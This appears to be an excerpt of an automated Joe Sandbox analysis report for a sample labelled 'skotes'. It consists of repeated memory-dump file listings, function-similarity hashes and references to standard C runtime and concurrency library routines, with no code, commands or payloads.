                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AdjustPointer
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1740715915-0
                                                                                                                                                                                                                                          • Opcode ID: 4fdbe6d751ea0ad4542f8b9232809378e9a759743343b517ad174f400e1c2f95
                                                                                                                                                                                                                                          • Instruction ID: e910d7ec11d7e784d1ee9b40920f403df6cacb8df18ed531359a77231e44568c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4fdbe6d751ea0ad4542f8b9232809378e9a759743343b517ad174f400e1c2f95
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A510572609A06AFDB349F14D881BBAB3F5EF12300F1445EDE901A76A0E731EE40CB90
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: EqualOffsetTypeids
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1707706676-0
                                                                                                                                                                                                                                          • Opcode ID: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
                                                                                                                                                                                                                                          • Instruction ID: 68f4b2a8f4809e83f26f29c798e362bda9b6289c7009383153d58dd923bca983
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99518B35A082099FDF11CF68C4816EEBBF5EF96364F1444EAE890A7351D7B2AE05CB50
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Mtx_unlock$Cnd_broadcastCurrentThread
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3264154886-0
                                                                                                                                                                                                                                          • Opcode ID: f984fc158801404d90ca8b457dd81b4796c8a202989094727cb1b9f33c326dd9
                                                                                                                                                                                                                                          • Instruction ID: 3f0231cffc1a47d64b04f69af7fa15e6cef7bd8770a0914669094c7a68d02905
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f984fc158801404d90ca8b457dd81b4796c8a202989094727cb1b9f33c326dd9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3541B1B09016059FDB21EF64C944B5ABBF8FF14720F0085A9E82AD7790FB35EA05CB91
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00B9DB64
                                                                                                                                                                                                                                            • Part of subcall function 00B98F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00B98F50
                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00B9DBC3
                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00B9DBE9
                                                                                                                                                                                                                                          • Concurrency::location::_Assign.LIBCMT ref: 00B9DC56
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Context$Base::Concurrency::details::$EventInternal$AssignBlockingConcurrency::location::_FindNestingPrepareThrowTraceWork
